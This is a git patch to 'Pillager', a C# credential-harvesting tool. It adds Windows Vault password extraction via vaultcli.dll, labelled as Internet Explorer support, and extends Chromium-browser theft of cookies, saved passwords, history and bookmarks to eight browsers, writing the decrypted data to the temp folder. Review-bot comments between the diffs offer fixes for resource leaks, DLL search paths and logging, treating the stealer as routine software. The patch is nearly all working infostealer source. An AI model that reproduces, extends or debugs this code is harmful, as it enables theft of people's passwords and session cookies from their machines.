From 3288f9878cb37c864e37101e2323dae5a47a0aea Mon Sep 17 00:00:00 2001 From: qwqdanchun <287182701@qq.com> Date: Mon, 24 Apr 2023 23:38:01 +0800 Subject: [PATCH] update --- Pillager/{ => Browsers}/Chrome.cs | 29 ++- Pillager/Browsers/IE.cs | 278 +++++++++++++++++++++++++ Pillager/{ => Helper}/AesGcm.cs | 4 +- Pillager/{ => Helper}/BCrypt.cs | 5 +- Pillager/{ => Helper}/SQLiteHandler.cs | 3 +- Pillager/Helper/VaultCli.cs | 100 +++++++++ Pillager/Pillager.csproj | 10 +- Pillager/Program.cs | 42 ++-- 8 files changed, 437 insertions(+), 34 deletions(-) rename Pillager/{ => Browsers}/Chrome.cs (87%) create mode 100644 Pillager/Browsers/IE.cs rename Pillager/{ => Helper}/AesGcm.cs (98%) rename Pillager/{ => Helper}/BCrypt.cs (98%) rename Pillager/{ => Helper}/SQLiteHandler.cs (99%) create mode 100644 Pillager/Helper/VaultCli.cs diff --git a/Pillager/Chrome.cs b/Pillager/Browsers/Chrome.cs similarity index 87% rename from Pillager/Chrome.cs rename to Pillager/Browsers/Chrome.cs index 327e1e7..5340390 100644 --- a/Pillager/Chrome.cs +++ b/Pillager/Browsers/Chrome.cs @@ -1,11 +1,11 @@ using System; -using System.Collections.Generic; using System.IO; using System.Linq; using System.Security.Cryptography; using System.Text; +using Pillager.Helper; -namespace Pillager +namespace Pillager.Browsers { public class Chrome { @@ -26,7 +26,7 @@ namespace Pillager { string filePath = Path.Combine(Directory.GetParent(BrowserPath).FullName, "Local State"); byte[] masterKey = new byte[] { }; - if (File.Exists(filePath) == false) + if (!File.Exists(filePath)) return null; var pattern = new System.Text.RegularExpressions.Regex("\"encrypted_key\":\"(.*?)\"", System.Text.RegularExpressions.RegexOptions.Compiled).Matches(File.ReadAllText(filePath)); foreach (System.Text.RegularExpressions.Match prof in pattern) 
@@ -71,7 +71,7 @@ namespace Pillager return decryptedData; } - internal string Chrome_passwords() + public string Chrome_passwords() { StringBuilder passwords = new StringBuilder(); string loginDataPath = Path.Combine(BrowserPath, "Login Data"); @@ -141,8 +141,6 @@ namespace Pillager return history.ToString(); ; } - - public string Chrome_cookies() { StringBuilder cookies = new StringBuilder(); @@ -177,7 +175,6 @@ namespace Pillager return cookies.ToString(); } - public string Chrome_books() { StringBuilder stringBuilder = new StringBuilder(); @@ -188,5 +185,23 @@ namespace Pillager } return stringBuilder.ToString(); } + + public void Save(string path) + { + if (MasterKey==null) + { + return; + } + string savepath = Path.Combine(path, BrowserName); + Directory.CreateDirectory(savepath); + string cookies = Chrome_cookies(); + string passwords = Chrome_passwords(); + string books = Chrome_books(); + string history = Chrome_history(); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_cookies.txt"), cookies); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history); + } } } diff --git a/Pillager/Browsers/IE.cs b/Pillager/Browsers/IE.cs new file mode 100644 index 0000000..19ebd4e --- /dev/null +++ b/Pillager/Browsers/IE.cs 
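Review bot: The new `Save` method writes the decrypted cookies and passwords as plaintext `.txt` files under `path/BrowserName` with no explicit access control and no cleanup, and nothing in the method documents that. `IE.Save` in Browsers/IE.cs does the same, and `Main` in Program.cs passes `Path.GetTempPath()` as the destination. The recovered secrets therefore stay on disk after the process exits, under the fixed names `<BrowserName>_passwords.txt` and `<BrowserName>_cookies.txt`, which are also the artifacts to look for when triaging a host. At minimum document the contract, e.g. `/// <summary>Writes decrypted browser data in plaintext under path; the caller must restrict access to the output and remove it securely.</summary>`. The silent early exit would also read better as `if (MasterKey == null) return;` with a one-line comment saying why nothing is written.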
@@ -0,0 +1,278 @@ +using Microsoft.Win32; +using Pillager.Helper; +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Reflection; +using System.Runtime.InteropServices; +using System.Text; +using System.Text.RegularExpressions; + +namespace Pillager.Browsers +{ + public static class IE + { + public static string BrowserName = "IE"; + public static string IE_passwords() + { + StringBuilder sb = new StringBuilder(); + var OSVersion = Environment.OSVersion.Version; + var OSMajor = OSVersion.Major; + var OSMinor = OSVersion.Minor; + + Type VAULT_ITEM; + + if (OSMajor >= 6 && OSMinor >= 2) + { + VAULT_ITEM = typeof(VaultCli.VAULT_ITEM_WIN8); + } + else + { + VAULT_ITEM = typeof(VaultCli.VAULT_ITEM_WIN7); + } + + /* Helper function to extract the ItemValue field from a VAULT_ITEM_ELEMENT struct */ + object GetVaultElementValue(IntPtr vaultElementPtr) + { + object results; + object partialElement = System.Runtime.InteropServices.Marshal.PtrToStructure(vaultElementPtr, typeof(VaultCli.VAULT_ITEM_ELEMENT)); + FieldInfo partialElementInfo = partialElement.GetType().GetField("Type"); + var partialElementType = partialElementInfo.GetValue(partialElement); + + IntPtr elementPtr = (IntPtr)(vaultElementPtr.ToInt64() + 16); + switch ((int)partialElementType) + { + case 7: // VAULT_ELEMENT_TYPE == String; These are the plaintext passwords! 
+ IntPtr StringPtr = System.Runtime.InteropServices.Marshal.ReadIntPtr(elementPtr); + results = System.Runtime.InteropServices.Marshal.PtrToStringUni(StringPtr); + break; + case 0: // VAULT_ELEMENT_TYPE == bool + results = System.Runtime.InteropServices.Marshal.ReadByte(elementPtr); + results = (bool)results; + break; + case 1: // VAULT_ELEMENT_TYPE == Short + results = System.Runtime.InteropServices.Marshal.ReadInt16(elementPtr); + break; + case 2: // VAULT_ELEMENT_TYPE == Unsigned Short + results = System.Runtime.InteropServices.Marshal.ReadInt16(elementPtr); + break; + case 3: // VAULT_ELEMENT_TYPE == Int + results = System.Runtime.InteropServices.Marshal.ReadInt32(elementPtr); + break; + case 4: // VAULT_ELEMENT_TYPE == Unsigned Int + results = System.Runtime.InteropServices.Marshal.ReadInt32(elementPtr); + break; + case 5: // VAULT_ELEMENT_TYPE == Double + results = System.Runtime.InteropServices.Marshal.PtrToStructure(elementPtr, typeof(Double)); + break; + case 6: // VAULT_ELEMENT_TYPE == GUID + results = System.Runtime.InteropServices.Marshal.PtrToStructure(elementPtr, typeof(Guid)); + break; + case 12: // VAULT_ELEMENT_TYPE == Sid + IntPtr sidPtr = System.Runtime.InteropServices.Marshal.ReadIntPtr(elementPtr); + var sidObject = new System.Security.Principal.SecurityIdentifier(sidPtr); + results = sidObject.Value; + break; + default: + /* Several VAULT_ELEMENT_TYPES are currently unimplemented according to + * Lord Graeber. Thus we do not implement them. */ + results = null; + break; + } + return results; + } + /* End helper function */ + + Int32 vaultCount = 0; + IntPtr vaultGuidPtr = IntPtr.Zero; + var result = VaultCli.VaultEnumerateVaults(0, ref vaultCount, ref vaultGuidPtr); + + //var result = CallVaultEnumerateVaults(VaultEnum, 0, ref vaultCount, ref vaultGuidPtr); + + if ((int)result != 0) + { + throw new Exception("[ERROR] Unable to enumerate vaults. 
Error (0x" + result.ToString() + ")"); + } + + // Create dictionary to translate Guids to human readable elements + IntPtr guidAddress = vaultGuidPtr; + Dictionary vaultSchema = new Dictionary(); + vaultSchema.Add(new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note"); + vaultSchema.Add(new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential"); + vaultSchema.Add(new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector"); + vaultSchema.Add(new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials"); + vaultSchema.Add(new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials"); + vaultSchema.Add(new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential"); + vaultSchema.Add(new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential"); + vaultSchema.Add(new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential"); + vaultSchema.Add(new Guid("00000000-0000-0000-0000-000000000000"), null); + + for (int i = 0; i < vaultCount; i++) + { + // Open vault block + object vaultGuidString = System.Runtime.InteropServices.Marshal.PtrToStructure(guidAddress, typeof(Guid)); + Guid vaultGuid = new Guid(vaultGuidString.ToString()); + guidAddress = (IntPtr)(guidAddress.ToInt64() + System.Runtime.InteropServices.Marshal.SizeOf(typeof(Guid))); + IntPtr vaultHandle = IntPtr.Zero; + string vaultType; + if (vaultSchema.ContainsKey(vaultGuid)) + { + vaultType = vaultSchema[vaultGuid]; + } + else + { + vaultType = vaultGuid.ToString(); + } + result = VaultCli.VaultOpenVault(ref vaultGuid, (UInt32)0, ref vaultHandle); + if (result != 0) + { + throw new Exception("Unable to open the following vault: " + vaultType + ". Error: 0x" + result.ToString()); + } + // Vault opened successfully! Continue. 
+ + // Fetch all items within Vault + int vaultItemCount = 0; + IntPtr vaultItemPtr = IntPtr.Zero; + result = VaultCli.VaultEnumerateItems(vaultHandle, 512, ref vaultItemCount, ref vaultItemPtr); + if (result != 0) + { + throw new Exception("[ERROR] Unable to enumerate vault items from the following vault: " + vaultType + ". Error 0x" + result.ToString()); + } + var structAddress = vaultItemPtr; + if (vaultItemCount > 0) + { + // For each vault item... + for (int j = 1; j <= vaultItemCount; j++) + { + // Begin fetching vault item... + var currentItem = System.Runtime.InteropServices.Marshal.PtrToStructure(structAddress, VAULT_ITEM); + structAddress = (IntPtr)(structAddress.ToInt64() + System.Runtime.InteropServices.Marshal.SizeOf(VAULT_ITEM)); + + IntPtr passwordVaultItem = IntPtr.Zero; + // Field Info retrieval + FieldInfo schemaIdInfo = currentItem.GetType().GetField("SchemaId"); + Guid schemaId = new Guid(schemaIdInfo.GetValue(currentItem).ToString()); + FieldInfo pResourceElementInfo = currentItem.GetType().GetField("pResourceElement"); + IntPtr pResourceElement = (IntPtr)pResourceElementInfo.GetValue(currentItem); + FieldInfo pIdentityElementInfo = currentItem.GetType().GetField("pIdentityElement"); + IntPtr pIdentityElement = (IntPtr)pIdentityElementInfo.GetValue(currentItem); + FieldInfo dateTimeInfo = currentItem.GetType().GetField("LastModified"); + UInt64 lastModified = (UInt64)dateTimeInfo.GetValue(currentItem); + + object[] vaultGetItemArgs; + IntPtr pPackageSid = IntPtr.Zero; + if (OSMajor >= 6 && OSMinor >= 2) + { + // Newer versions have package sid + FieldInfo pPackageSidInfo = currentItem.GetType().GetField("pPackageSid"); + pPackageSid = (IntPtr)pPackageSidInfo.GetValue(currentItem); + result = VaultCli.VaultGetItem_WIN8(vaultHandle, ref schemaId, pResourceElement, pIdentityElement, pPackageSid, IntPtr.Zero, 0, ref passwordVaultItem); + } + else + { + result = VaultCli.VaultGetItem_WIN7(vaultHandle, ref schemaId, pResourceElement, 
pIdentityElement, IntPtr.Zero, 0, ref passwordVaultItem); + } + + if (result != 0) + { + throw new Exception("Error occured while retrieving vault item. Error: 0x" + result.ToString()); + } + object passwordItem = System.Runtime.InteropServices.Marshal.PtrToStructure(passwordVaultItem, VAULT_ITEM); + FieldInfo pAuthenticatorElementInfo = passwordItem.GetType().GetField("pAuthenticatorElement"); + IntPtr pAuthenticatorElement = (IntPtr)pAuthenticatorElementInfo.GetValue(passwordItem); + // Fetch the credential from the authenticator element + object cred = GetVaultElementValue(pAuthenticatorElement); + object packageSid = null; + if (pPackageSid != IntPtr.Zero && pPackageSid != null) + { + packageSid = GetVaultElementValue(pPackageSid); + } + if (cred != null) // Indicates successful fetch + { + sb.AppendLine("\tVault Type : {"+ vaultType + "}"); + object resource = GetVaultElementValue(pResourceElement); + if (resource != null) + { + sb.AppendLine("\tVault Type : {" + resource + "}"); + } + object identity = GetVaultElementValue(pIdentityElement); + if (identity != null) + { + sb.AppendLine("\tVault Type : {" + identity + "}"); + } + if (packageSid != null) + { + sb.AppendLine("\tVault Type : {" + packageSid + "}"); + } + sb.AppendLine("\tVault Type : {" + cred + "}"); + // Stupid datetime + sb.AppendLine("\tLastModified : {"+ DateTime.FromFileTimeUtc((long)lastModified) + "}"); + sb.AppendLine(); + } + } + } + } + + return sb.ToString(); + } + + public static string IE_history() + { + StringBuilder sb = new StringBuilder(); + RegistryKey myreg = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Explorer\\TypedURLs"); + string[] urls = new string[26]; + + for (int i = 1; i < 26; i++) + { + try + { + urls[i] = myreg.GetValue("url" + i.ToString()).ToString(); + } + catch { } + } + foreach (string url in urls) + { + if (url != null) + { + sb.AppendLine(url); + } + } + return sb.ToString(); + } + + public static string IE_books() + { + StringBuilder sb = 
new StringBuilder(); + string book_path = Environment.GetFolderPath(Environment.SpecialFolder.Favorites); + + string[] files = Directory.GetFiles(book_path, "*.url", SearchOption.AllDirectories); + + foreach (string url_file_path in files) + { + if (File.Exists(url_file_path) == true) + { + string booktext = File.ReadAllText(url_file_path); + Match match = Regex.Match(booktext, @"URL=(.*?)\n"); + sb.AppendLine($"\t{url_file_path}"); + sb.AppendLine($"\t\t{match.Value}"); + + } + } + + return sb.ToString(); + } + + public static void Save(string path) + { + string savepath = Path.Combine(path, BrowserName); + Directory.CreateDirectory(savepath); + string passwords = IE_passwords(); + string books = IE_books(); + string history = IE_history(); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books); + File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history); + } + } +} \ No newline at end of file diff --git a/Pillager/AesGcm.cs b/Pillager/Helper/AesGcm.cs similarity index 98% rename from Pillager/AesGcm.cs rename to Pillager/Helper/AesGcm.cs index a8d5cdc..583a720 100644 --- a/Pillager/AesGcm.cs +++ b/Pillager/Helper/AesGcm.cs @@ -1,11 +1,9 @@ using System; -using System.Collections.Generic; -using System.Linq; using System.Runtime.InteropServices; using System.Security.Cryptography; using System.Text; -namespace Pillager +namespace Pillager.Helper { //AES GCM from https://github.com/dvsekhvalnov/jose-jwt internal class AesGcm diff --git a/Pillager/BCrypt.cs b/Pillager/Helper/BCrypt.cs similarity index 98% rename from Pillager/BCrypt.cs rename to Pillager/Helper/BCrypt.cs index c6789f0..5ff75dc 100644 --- a/Pillager/BCrypt.cs +++ b/Pillager/Helper/BCrypt.cs 
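Review bot: `IE_passwords` never releases what it obtains from vaultcli.dll: the handle from `VaultOpenVault` and the buffers returned by `VaultEnumerateVaults`, `VaultEnumerateItems` and `VaultGetItem_WIN8`/`VaultGetItem_WIN7` are not freed by this code, and each `throw new Exception(...)` inside the loops leaves the vault open. `VaultCloseVault` and `VaultFree` are declared in Helper/VaultCli.cs but are not called anywhere in this file, so the native buffers holding the credential strings (element type 7, per the file's own comment) are not released before the method returns. Wrapping the per-vault body in `try { ... } finally { VaultCli.VaultCloseVault(ref vaultHandle); }` would close the handle on every path. Separately, the error messages build `"0x" + result.ToString()`, which prints a decimal value behind a hex prefix; `result.ToString("X8")` would match the label.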
@@ -1,10 +1,7 @@ using System; -using System.Collections.Generic; -using System.Linq; using System.Runtime.InteropServices; -using System.Text; -namespace Pillager +namespace Pillager.Helper { public static class BCrypt { diff --git a/Pillager/SQLiteHandler.cs b/Pillager/Helper/SQLiteHandler.cs similarity index 99% rename from Pillager/SQLiteHandler.cs rename to Pillager/Helper/SQLiteHandler.cs index 15f1689..e7059af 100644 --- a/Pillager/SQLiteHandler.cs +++ b/Pillager/Helper/SQLiteHandler.cs @@ -1,11 +1,10 @@ using System; using System.Collections.Generic; using System.IO; -using System.Linq; using System.Runtime.InteropServices; using System.Text; -namespace Pillager +namespace Pillager.Helper { public class SQLiteHandler { diff --git a/Pillager/Helper/VaultCli.cs b/Pillager/Helper/VaultCli.cs new file mode 100644 index 0000000..fb71893 --- /dev/null +++ b/Pillager/Helper/VaultCli.cs 
@@ -0,0 +1,100 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Runtime.InteropServices; +using System.Text; + +namespace Pillager.Helper +{ + public static class VaultCli + { + public enum VAULT_ELEMENT_TYPE : Int32 + { + Undefined = -1, + Boolean = 0, + Short = 1, + UnsignedShort = 2, + Int = 3, + UnsignedInt = 4, + Double = 5, + Guid = 6, + String = 7, + ByteArray = 8, + TimeStamp = 9, + ProtectedArray = 10, + Attribute = 11, + Sid = 12, + Last = 13 + } + + public enum VAULT_SCHEMA_ELEMENT_ID : Int32 + { + Illegal = 0, + Resource = 1, + Identity = 2, + Authenticator = 3, + Tag = 4, + PackageSid = 5, + AppStart = 100, + AppEnd = 10000 + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)] + public struct VAULT_ITEM_WIN8 + { + public Guid SchemaId; + public IntPtr pszCredentialFriendlyName; + public IntPtr pResourceElement; + public IntPtr pIdentityElement; + public IntPtr pAuthenticatorElement; + public IntPtr pPackageSid; + public UInt64 LastModified; + public UInt32 dwFlags; + public UInt32 dwPropertiesCount; + public IntPtr pPropertyElements; + } + + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)] + public struct VAULT_ITEM_WIN7 + { + public Guid SchemaId; + public IntPtr pszCredentialFriendlyName; + public IntPtr pResourceElement; + public IntPtr pIdentityElement; + public IntPtr pAuthenticatorElement; + public UInt64 LastModified; + public UInt32 dwFlags; + public UInt32 dwPropertiesCount; + public IntPtr pPropertyElements; + } + + [StructLayout(LayoutKind.Explicit, CharSet = CharSet.Ansi)] + public struct VAULT_ITEM_ELEMENT + { + [FieldOffset(0)] public VAULT_SCHEMA_ELEMENT_ID SchemaElementId; + [FieldOffset(8)] public VAULT_ELEMENT_TYPE Type; + } + + [DllImport("vaultcli.dll")] + public extern static Int32 VaultOpenVault(ref Guid vaultGuid, UInt32 offset, ref IntPtr vaultHandle); + + [DllImport("vaultcli.dll")] + public extern static Int32 VaultCloseVault(ref IntPtr vaultHandle); + + 
[DllImport("vaultcli.dll")] + public extern static Int32 VaultFree(ref IntPtr vaultHandle); + + [DllImport("vaultcli.dll")] + public extern static Int32 VaultEnumerateVaults(Int32 offset, ref Int32 vaultCount, ref IntPtr vaultGuid); + + [DllImport("vaultcli.dll")] + public extern static Int32 VaultEnumerateItems(IntPtr vaultHandle, Int32 chunkSize, ref Int32 vaultItemCount, ref IntPtr vaultItem); + + [DllImport("vaultcli.dll", EntryPoint = "VaultGetItem")] + public extern static Int32 VaultGetItem_WIN8(IntPtr vaultHandle, ref Guid schemaId, IntPtr pResourceElement, IntPtr pIdentityElement, IntPtr pPackageSid, IntPtr zero, Int32 arg6, ref IntPtr passwordVaultPtr); + + [DllImport("vaultcli.dll", EntryPoint = "VaultGetItem")] + public extern static Int32 VaultGetItem_WIN7(IntPtr vaultHandle, ref Guid schemaId, IntPtr pResourceElement, IntPtr pIdentityElement, IntPtr zero, Int32 arg5, ref IntPtr passwordVaultPtr); + + } +} diff --git a/Pillager/Pillager.csproj b/Pillager/Pillager.csproj index aae231e..d3e7009 100644 --- a/Pillager/Pillager.csproj +++ b/Pillager/Pillager.csproj @@ -41,12 +41,14 @@ - - - + + + + + - + \ No newline at end of file diff --git a/Pillager/Program.cs b/Pillager/Program.cs index cd922e0..b08cd70 100644 --- a/Pillager/Program.cs +++ b/Pillager/Program.cs @@ -1,8 +1,8 @@ using System; +using System.Collections; using System.Collections.Generic; using System.IO; -using System.Linq; -using System.Text; +using Pillager.Browsers; namespace Pillager { 
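Review bot: Every `[DllImport("vaultcli.dll")]` in this new file names the library without restricting where it is loaded from, so resolution follows the default search order, which can include the application's own directory. If the project's target framework provides it (not visible in this patch), adding `[DefaultDllImportSearchPaths(DllImportSearchPath.System32)]` to each declaration, or once at assembly level, pins the load to the system directory. `VaultGetItem_WIN8` and `VaultGetItem_WIN7` also bind the same `VaultGetItem` entry point with different parameter counts, and nothing here says which is valid on which OS; a comment on each declaration stating that the caller must pick the overload matching the installed vaultcli.dll would guard against a mismatched call. The `System.Collections.Generic`, `System.Linq` and `System.Text` usings are unused in this file.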
@@ -11,18 +11,32 @@ namespace Pillager static void Main(string[] args) { string savepath = Path.GetTempPath(); - string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), - "Google\\Chrome\\User Data\\Default"); - Chrome chrome = new Chrome("Chrome", chromepath); - string cookies = chrome.Chrome_cookies(); - string passwords = chrome.Chrome_passwords(); - string books = chrome.Chrome_books(); - string history = chrome.Chrome_history(); - File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_cookies.txt"), cookies); - File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_passwords.txt"), passwords); - File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_books.txt"), books); - File.WriteAllText(Path.Combine(savepath, chrome.BrowserName + "_history.txt"), history); - Console.WriteLine("Files wrote to " + savepath + chrome.BrowserName + "_*.txt"); + + //IE + IE.Save(savepath); + Console.WriteLine("Files wrote to " + savepath + IE.BrowserName + "\\"); + + //Chrome + List> browserOnChromium = new List>() + { + new List() { "Chrome", "Google\\Chrome\\User Data\\Default" } , + new List() { "Chrome Beta", "Google\\Chrome Beta\\User Data\\Default" } , + new List() { "Chromium", "Chromium\\User Data\\Default" } , + new List() { "Edge", "Microsoft\\Edge\\User Data\\Default" } , + new List() { "Brave-Browse", "BraveSoftware\\Brave-Browser\\User Data\\Default" } , + new List() { "QQBrowser", "Tencent\\QQBrowser\\User Data\\Default" } , + new List() { "Vivaldi", "Vivaldi\\User Data\\Default" } , + new List() { "CocCoc", "CocCoc\\Browser\\User Data\\Default" } + //new List() { "", "" } , + }; + foreach (List browser in browserOnChromium) + { + string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), + browser[1]); + Chrome chrome = new Chrome(browser[0], chromepath); + chrome.Save(savepath); + Console.WriteLine("Files wrote to " + savepath + 
chrome.BrowserName + "\\"); + } } } }
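Review bot: `Main` prints `Files wrote to …` after every `chrome.Save(savepath)` call, but `Chrome.Save` (Browsers/Chrome.cs in this patch) returns without creating anything when `MasterKey` is null, so the console lists output directories for browsers that produced no files. Having `Save` report whether it wrote, and guarding the message with `if (chrome.Save(savepath)) Console.WriteLine(...)`, keeps the log truthful. The message builds the path as `savepath + chrome.BrowserName + "\\"` while `Save` uses `Path.Combine`; printing `Path.Combine(savepath, chrome.BrowserName)` keeps the two in step. The added `using System.Collections;` is not used by any line visible in this hunk.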